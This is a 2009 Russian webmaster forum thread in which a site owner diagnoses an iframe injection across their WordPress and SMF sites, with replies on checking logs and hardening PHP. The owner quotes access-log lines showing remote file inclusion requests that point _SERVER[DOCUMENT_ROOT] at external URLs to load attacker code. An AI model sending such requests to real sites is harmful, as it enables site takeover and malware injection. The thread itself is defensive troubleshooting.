Вернуться   Форум SAPE.RU > Другое > Курилка

-->
Ответ
 
Опции темы
Старый 22.06.2009, 11:26   #1
Специалист
 
Аватар для cool
 
Регистрация: 05.08.2008
Сообщений: 448
Вес репутации: 212
cool - за этого человека можно гордитсяcool - за этого человека можно гордитсяcool - за этого человека можно гордитсяcool - за этого человека можно гордитсяcool - за этого человека можно гордитсяcool - за этого человека можно гордитсяcool - за этого человека можно гордитсяcool - за этого человека можно гордитсяcool - за этого человека можно гордится
По умолчанию Меня поломали слегка

Вчера сижу на своём форуме, никого не трогаю. В какой то момент замечаю, что страница долго грузится, отправляя (получая ли) запрос на что-то вроде dajtedenegmnesejchas.com.
Смотрю код страницы - в футере, в самом низу, добавлен iframe код со ссылкой на вышеуказанный сайт. Смотрю остальные сайты на этом ftp - код вставлен на всех сайтах в index.php.
Разные движки сайтов, есть Wordpress и SMF (форум), на последний, кстати, грешу больше всего.

Теперь вопрос: КАК? Доступа по фтп небыло - логи фтп чистые. Пароли в клиентах и браузерах не храню - вбиваю вручную или копипастю. Проверился на вирусы - NOD молчит, avz нашёл кучу всего, но ведь явно дело не в вирусах, если доступа по фтп небыло?

В общем, стандартную процедуру я сделал - всё что можно было поменять, поменял, всё что можно было вычистить - вычистил.
Может кто подскажет ещё: как по логам узнать, откуда пришла зараза и что происходило с сайтами?
cool вне форума   Ответить с цитированием
Старый 22.06.2009, 11:29   #2
Banned
 
Регистрация: 18.06.2009
Сообщений: 10
Вес репутации: 0
papokarlo на пути к лучшему
По умолчанию

могли троем своровать...
papokarlo вне форума   Ответить с цитированием
Старый 22.06.2009, 11:35   #3
Специалист
 
Аватар для Max.im
 
Регистрация: 15.11.2007
Адрес: 127ю0ю0ю1
Сообщений: 212
Вес репутации: 210
Max.im - это имя известно всемMax.im - это имя известно всемMax.im - это имя известно всемMax.im - это имя известно всемMax.im - это имя известно всемMax.im - это имя известно всем
Отправить сообщение для Max.im с помощью ICQ
По умолчанию

Цитата:
Сообщение от cool Посмотреть сообщение
Теперь вопрос: КАК? Доступа по фтп небыло
Скорее всего инклуд был, логи апаче смотрите
Max.im вне форума   Ответить с цитированием
Старый 22.06.2009, 11:44   #4
шайтанама
 
Аватар для shadx
 
Регистрация: 13.07.2007
Сообщений: 1,700
Вес репутации: 298
shadx - прекрасное будущееshadx - прекрасное будущееshadx - прекрасное будущееshadx - прекрасное будущееshadx - прекрасное будущееshadx - прекрасное будущееshadx - прекрасное будущееshadx - прекрасное будущееshadx - прекрасное будущееshadx - прекрасное будущееshadx - прекрасное будущее
Отправить сообщение для shadx с помощью ICQ
По умолчанию

вирутал хосты на серванте в одной папке ???
если да, то через дырку в движке шел сделали.
shadx вне форума   Ответить с цитированием
Старый 22.06.2009, 12:06   #5
Специалист
 
Аватар для cool
 
Регистрация: 05.08.2008
Сообщений: 448
Вес репутации: 212
cool - за этого человека можно гордитсяcool - за этого человека можно гордитсяcool - за этого человека можно гордитсяcool - за этого человека можно гордитсяcool - за этого человека можно гордитсяcool - за этого человека можно гордитсяcool - за этого человека можно гордитсяcool - за этого человека можно гордитсяcool - за этого человека можно гордится
По умолчанию

Цитата:
Сообщение от shadx Посмотреть сообщение
вирутал хосты на серванте в одной папке ???
если имеется ввиду public_html, то да - все сайты в этой папке, но в разных подпапках.

Почти ламерские вопросы: где лежат логи апача и на что именно там обратить внимание?
cool вне форума   Ответить с цитированием
Старый 22.06.2009, 12:19   #6
шайтанама
 
Аватар для shadx
 
Регистрация: 13.07.2007
Сообщений: 1,700
Вес репутации: 298
shadx - прекрасное будущееshadx - прекрасное будущееshadx - прекрасное будущееshadx - прекрасное будущееshadx - прекрасное будущееshadx - прекрасное будущееshadx - прекрасное будущееshadx - прекрасное будущееshadx - прекрасное будущееshadx - прекрасное будущееshadx - прекрасное будущее
Отправить сообщение для shadx с помощью ICQ
По умолчанию

Цитата:
Сообщение от cool Посмотреть сообщение
если имеется ввиду public_html, то да - все сайты в этой папке, но в разных подпапках.

Почти ламерские вопросы: где лежат логи апача и на что именно там обратить внимание?
полностью зависит от хостинга настроек и панели управления ...
Если есть чего нить типа webstata ... то там можно поискать "неправильные" запросы к сайту
shadx вне форума   Ответить с цитированием
Старый 22.06.2009, 12:33   #7
Специалист
 
Аватар для Max.im
 
Регистрация: 15.11.2007
Адрес: 127ю0ю0ю1
Сообщений: 212
Вес репутации: 210
Max.im - это имя известно всемMax.im - это имя известно всемMax.im - это имя известно всемMax.im - это имя известно всемMax.im - это имя известно всемMax.im - это имя известно всем
Отправить сообщение для Max.im с помощью ICQ
По умолчанию

Цитата:
Сообщение от cool Посмотреть сообщение
и на что именно там обратить внимание?
на присутствие левых данных(урлов) в запросах к сайту
Max.im вне форума   Ответить с цитированием
Старый 22.06.2009, 14:49   #8
Специалист
 
Аватар для cool
 
Регистрация: 05.08.2008
Сообщений: 448
Вес репутации: 212
cool - за этого человека можно гордитсяcool - за этого человека можно гордитсяcool - за этого человека можно гордитсяcool - за этого человека можно гордитсяcool - за этого человека можно гордитсяcool - за этого человека можно гордитсяcool - за этого человека можно гордитсяcool - за этого человека можно гордитсяcool - за этого человека можно гордится
По умолчанию

Хм. Влогах доступа к форуму есть:

216.139.67.116 - - [22/Jun/2009:01:10:22 +0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.portalsana.com.br/SiJi?? HTTP/1.0" 200 29899 "-" "Mozilla/5.0"
216.139.67.116 - - [22/Jun/2009:01:10:22 +0400] "GET /index.php?action=sitemap;xml/?_SERVER[DOCUMENT_ROOT]=http://www.portalsana.com.br/SiJi?? HTTP/1.0" 200 17769 "-" "Mozilla/5.0"

Описание нашёл здесь: http://www.lh-news.com/main.php
Real-Time Internet Report on Jun 2009 Dangerous Domains

Только по времени не сходится - в час ночи по москве я уже всё почистил... Посмотрю ещё

Добавлено через 1 час 40 минут
Нашёл ещё один запрос с того же айпишника (это уже в логах форума - все остальные логи чистые):

http://***************.ru/index.php?...p;xml/?_SERVER[DOCUMENT_ROOT]=http://www.italiaiuta.org/docs/Conf??

Если я правильно понимаю, хакают через плагин сайтмапы. Пошёл курить форумы.
Всем спасибо!

Последний раз редактировалось cool; 22.06.2009 в 14:49. Причина: Добавлено сообщение
cool вне форума   Ответить с цитированием
Старый 22.06.2009, 14:52   #9
Добрый модератор
 
Аватар для zhegloff
 
Регистрация: 09.07.2007
Адрес: глобус Украины
Сообщений: 27,600
Вес репутации: 1025
zhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущее
По умолчанию

cool, register_globals=Off
__________________
Установка кода сапы от $9.95. Пишите в личку.
Правильный хостинг.
В личке бесплатно не отвечаю обычно.
zhegloff вне форума   Ответить с цитированием
Старый 22.06.2009, 14:58   #10
не эксперт
 
Регистрация: 14.06.2008
Адрес: msk
Сообщений: 2,180
Вес репутации: 294
zeta - прекрасное будущееzeta - прекрасное будущееzeta - прекрасное будущееzeta - прекрасное будущееzeta - прекрасное будущееzeta - прекрасное будущееzeta - прекрасное будущееzeta - прекрасное будущееzeta - прекрасное будущееzeta - прекрасное будущееzeta - прекрасное будущее
По умолчанию

поставила на всех индексных права 444, после такого..
zeta вне форума   Ответить с цитированием
Ответ


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Кажется WebMoney поломали... ninzza Курилка 39 12.01.2009 20:11
Без меня меня женили graver Вопросы по работе системы 27 18.11.2008 00:29
поиск умер слегка.. lipsko Ошибки при работе с системой 15 08.07.2008 18:54
Это только у меня? web13 Яндекс 4 27.11.2007 08:02
За что меня в BL? vitich Вопросы по работе системы 5 25.10.2007 16:25


Часовой пояс GMT +3, время: 20:13.